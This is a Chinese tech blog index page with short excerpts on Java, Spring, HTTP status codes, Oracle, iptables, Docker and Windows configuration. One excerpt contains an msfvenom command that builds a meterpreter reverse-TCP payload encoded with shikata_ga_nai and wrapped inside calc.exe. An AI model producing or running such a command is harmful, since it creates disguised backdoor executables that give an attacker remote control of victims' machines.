上一页 1 ··· 8 9 10 11 12 13 14 15 16 ··· 24 下一页
摘要: 在客户端编程语言中,如javascript和ActionScript,同源策略是一个很重要的安全理念,它在保证数据的安全性方面有着重要的意 义。同源策略规定跨域之间的脚本是隔离的,一个域的脚本不能访问和操作另外一个域的绝大部分属性和方法。那么什么叫相同域,什么叫不同的域呢? 同源策略 在客户端编程语言中,如javascript和 ActionScript,同源策略是一个很重要的安全理念,它在... 阅读全文
posted @ 2017-03-16 15:11 Earic 阅读(313) 评论(0) 推荐(0) 编辑
摘要: Spring 框架 优点 1.提供了一种管理对象的方法,可以把中间层的对象有效地组织起来 2.采用了分层结构,可以增量引入到项目中。 3.代码测试较容易 4.非侵入性,应用程序对Spring API的依赖可以减至最小 5.轻量级的架构解决方案 6.一致的数据访问界面 缺点 1.因为spring使用了控制反转技术,所以应用程序的逻辑被中断,代码变得不完整,但看代码无法把握所有行为,不能了解整个系... 阅读全文
posted @ 2017-03-16 14:46 Earic 阅读(3089) 评论(0) 推荐(0) 编辑
摘要: ① 客户方错误 100 继续 101 交换协议 ② 成功 200 OK 201 已创建 202 接收 203 非认证信息 204 无内容 205 重置内容 206 部分内容 ③ 重定向 300 多路选择 301 永久转移 302 暂时转移 303 参见其它 304 未修改(Not Modified) 305 使用代理 ④ 客户方错误 400 错误请求(Bad Re... 阅读全文
posted @ 2017-03-16 14:44 Earic 阅读(1422) 评论(0) 推荐(0) 编辑
摘要: service端: @Path("/hello") public class HelloService { @GET @Produces("text/plain") public String helloWorld(){ return "hello world"; } /* * post param... 阅读全文
posted @ 2017-03-16 14:43 Earic 阅读(5304) 评论(0) 推荐(0) 编辑
摘要: 1.可以在servlet的init方法里 String path = getServletContext().getRealPath("/"); 这将获取web项目的全路径 例如 :E:\eclipseM9\workspace\tree\ tree是我web项目的根目录 2.你也可以随时在任意的class里调用 this.getClass().getClassLoader().getResou... 阅读全文
posted @ 2017-03-16 14:42 Earic 阅读(5054) 评论(0) 推荐(0) 编辑
摘要: show allowedprogram –显示被允许的程序配置 show config - 显示防火墙的配置 show currentprofile -显示 Windows 防火墙的当前配置文件. show icmpsetting -显示 Windows 防火墙中的 ICMP 配置 show log 阅读全文
posted @ 2017-03-14 18:03 Earic 阅读(321) 评论(0) 推荐(0) 编辑
摘要: export ORACLE_BASE=/u01/app/oracle export ORACLE_HOME=$ORACLE_BASE/product/10.2.0/db_1 su - root ln -s $ORACLE_HOME/bin/sqlplus /usr/bin su - oracle sqlplus /nolog 阅读全文
posted @ 2017-03-14 15:00 Earic 阅读(9452) 评论(0) 推荐(1) 编辑
摘要: 1、msconfig --> 引导--> 高级选项 --> 处理器个数2、系统属性 --> 高级 --> 性能(高级)-->高级(更改)-->取消自动管理分页大小3、电源选项 --> 选择电源按钮的功能-->更改当前不可用的设置->启用快速启动(先取消掉,重启完勾上)4、gpedit.msc--> 阅读全文
posted @ 2017-03-14 13:32 Earic 阅读(202) 评论(0) 推荐(0) 编辑
摘要: msconfig-->引导-->高级选项-->最大内存勾去掉 阅读全文
posted @ 2017-03-14 09:42 Earic 阅读(1107) 评论(0) 推荐(0) 编辑
摘要: 目前唯一的方法只能通过修改Cortana目录的方法来禁止Cortana 路径:C:\Windows\SystemApps\Microsoft.Windows.Cortana_*** 阅读全文
posted @ 2017-03-12 22:32 Earic 阅读(596) 评论(0) 推荐(0) 编辑
摘要: #clientmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b '\x00' -x /root/demo/calc.exe -f exe > demo 阅读全文
posted @ 2017-03-11 11:15 Earic 阅读(176) 评论(0) 推荐(0) 编辑
摘要: iptables由4表、5链和用户在链内写入的各种规则所组成。(iptables(/etc/sysconfig/iptables /sbin/iptables)) 1、表:容纳各种规则链;表是按照功能分的类,具体功能如下: (1)raw表:用来决定是否对数据包进行状态跟踪。(不常用) (2)mangle表:为数据包设置标记,有ACK、SYN、FIN、RST、PSH、URG等标... 阅读全文
posted @ 2017-03-10 22:51 Earic 阅读(206) 评论(0) 推荐(0) 编辑
摘要: 原创,转载请注明出处,谢谢!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 首先查看系统glibc支持的版本: strings /lib64/libc.so.6 |grep GLIBC_ 或 rpm -qa |grep glibc 或 ll /lib64/libc.so.6 看 阅读全文
posted @ 2017-03-07 21:20 Earic 阅读(1181) 评论(0) 推荐(0) 编辑
摘要: 原因是没有GLIBCXX_3.4.15版本,或是更高的版本。 一、查看并下载 32位系统: [root@localhost ~]# strings /usr/lib/libstdc++.so.6 | grep GLIBCXX 下载新版本,地址:http://ftp.de.debian.org/debian/pool/main/g/gcc-4.7/libstdc++6_4.7.2... 阅读全文
posted @ 2017-03-07 20:01 Earic 阅读(1379) 评论(0) 推荐(0) 编辑
摘要: windows功能 -> 禁用hyper 阅读全文
posted @ 2017-03-06 21:05 Earic 阅读(12657) 评论(0) 推荐(0) 编辑
摘要: public abstract class Human { public abstract void doSomething(); } public class WhiteHuman extends Human { @Override public void doSomething() { } } public class YellowHuman exten... 阅读全文
posted @ 2017-03-02 21:43 Earic 阅读(211) 评论(0) 推荐(0) 编辑
摘要: Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\*\shell\runas] @="获取TrustedInstaller权限" [HKEY_CLASSES_ROOT\*\shell\runas\command] @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant adm... 阅读全文
posted @ 2017-03-02 21:33 Earic 阅读(471) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2017-03-02 21:29 Earic 阅读(221) 评论(0) 推荐(0) 编辑
摘要: 1、https://download.docker.com/win/stable/InstallDocker.msi 2、设置环境变量 C:\Program Files (x86)\Git\bin 3、如果是win10 开启Hyper-V(控制面板 -> 程序 -> 启用或关闭Windows功能 -> 选中Hyper-V) 4、如果启动的时候,提示内存不足,启动失败,可以在设定中调节VM内... 阅读全文
posted @ 2017-03-01 22:25 Earic 阅读(328) 评论(0) 推荐(0) 编辑
摘要: 1、maven-assembly-plugin 换成 --> maven-shade-plugin 2、jersey-bundle插件 阅读全文
posted @ 2017-03-01 22:23 Earic 阅读(500) 评论(0) 推荐(0) 编辑
摘要: import java.io.IOException; import java.nio.charset.Charset; import com.csvreader.CsvReader; import com.csvreader.CsvWriter; public class CsvUtil { /** * 读取CSV文件 * @throws Exception ... 阅读全文
posted @ 2017-02-28 20:36 Earic 阅读(428) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2017-02-27 21:11 Earic 阅读(55) 评论(0) 推荐(0) 编辑
摘要: apt-get install rdesktop $rdesktop -u administrator -p ****** -a 16 192.168.1.1 //都直接登陆了, 阅读全文
posted @ 2017-02-27 21:07 Earic 阅读(139) 评论(0) 推荐(0) 编辑
摘要: 选择启动磁盘………………………………….-Option 清除参数存储器(PRAM) …………………………Command + Option + p + r 启动为单用户模式………………………………-Command + s 打开主板固件………………………………….-Command + Option + o + f Finder 快捷键 隐藏 Finder ………………………………….-Co... 阅读全文
posted @ 2017-02-26 17:42 Earic 阅读(192) 评论(0) 推荐(0) 编辑
摘要: SSH Client:ServerAliveInterval 100 SSH server:ClientAliveInterval 30TCPKeepAlive yes ClientAliveCountMax 99999 sudo /etc/init.d/sshd restart 或 service 阅读全文
posted @ 2017-02-25 21:25 Earic 阅读(216) 评论(0) 推荐(0) 编辑
摘要: 1、查看大文件位置du -sh /* | sort -nr 2、分析,处理文件 阅读全文
posted @ 2017-02-23 21:20 Earic 阅读(732) 评论(0) 推荐(0) 编辑
摘要: 不管是中文环境还是英文环境,需要改的地方如下: /etc/sysconfig/i18n 其内容改为: LANG="zh_CN.GB2312"SYSFONT="latarcyrheb-sun16" 注销,重登录,问题解决 之所以会出现乱码,是因为windows用的字符编码是GB2312,而linux用 阅读全文
posted @ 2017-02-22 19:48 Earic 阅读(4924) 评论(0) 推荐(0) 编辑
摘要: if (FTPReply.isPositiveCompletion(ftpClient.sendCommand("OPTS UTF8", "ON"))) {// 开启服务器对UTF-8的支持,如果服务器支持就用UTF-8编码,否则就使用本地编码(GBK). LOCAL_CHARSET = "UTF- 阅读全文
posted @ 2017-02-16 20:41 Earic 阅读(694) 评论(0) 推荐(0) 编辑
摘要: 1、 登录数据库服务器2、 查看当前数据的实例$ps -ef|grep smonoracle 8747 1 0 14:38 ? 00:00:00 ora_smon_spsj ==spsj则当前库的实例是spsj sqlplus "/as sysdba"3、 确认使用的schema,即登录数据库的用户 阅读全文
posted @ 2017-02-15 21:50 Earic 阅读(1149) 评论(0) 推荐(0) 编辑
摘要: 解决方法: WINDOWS/system32/config/RegBack/SYSTEM/* 复制到 WINDOWS/system32/config/*下 阅读全文
posted @ 2017-02-13 23:06 Earic 阅读(12405) 评论(0) 推荐(0) 编辑
摘要: 启动 --> 疑难解答 -->高级工具 --> 命令行--> chkdsk /x /f c: cd c: ok ^_- 阅读全文
posted @ 2017-02-13 22:37 Earic 阅读(19178) 评论(0) 推荐(0) 编辑
摘要: windows --> Preferences --> General --> Editors --> Text Editors 右边 show white space letters 阅读全文
posted @ 2017-02-06 23:20 Earic 阅读(3623) 评论(0) 推荐(0) 编辑
摘要: 下载 (1)更改权限:# chmod 755 jdk-1.6.0_23-linux-i586.rpm.bin 执行安装:# ./ jdk-1.6.0_23-linux-i586.rpm.bin 此步完成后,会生成jdk-1.6.0_23-linux-i586.rpm的文件执行安装:# rpm –iv 阅读全文
posted @ 2017-01-19 23:46 Earic 阅读(1746) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2017-01-12 21:05 Earic 阅读(206) 评论(0) 推荐(0) 编辑
摘要: 下载地址 阅读全文
posted @ 2017-01-11 20:38 Earic 阅读(1254) 评论(0) 推荐(0) 编辑
摘要: centos静态demo centos 7查看网卡UUID nmcli con show 阅读全文
posted @ 2017-01-08 20:37 Earic 阅读(517) 评论(0) 推荐(0) 编辑
摘要: 新的工具地址: http://www.liangchanba.com/article-2690-1.html http://www.liangchanba.com/article-2688-1.html 阅读全文
posted @ 2017-01-08 20:36 Earic 阅读(1196) 评论(0) 推荐(0) 编辑
摘要: sudo su 阅读全文
posted @ 2017-01-08 19:35 Earic 阅读(205) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2017-01-07 11:57 Earic 阅读(145) 评论(0) 推荐(0) 编辑
摘要: 本地连接--> 属性 --> 配置(C) -->高级 页面的属性框中找到"Large Send Offload"(中文名称叫:大量传送减负)==>Disabled 阅读全文
posted @ 2017-01-07 11:20 Earic 阅读(551) 评论(0) 推荐(0) 编辑
上一页 1 ··· 8 9 10 11 12 13 14 15 16 ··· 24 下一页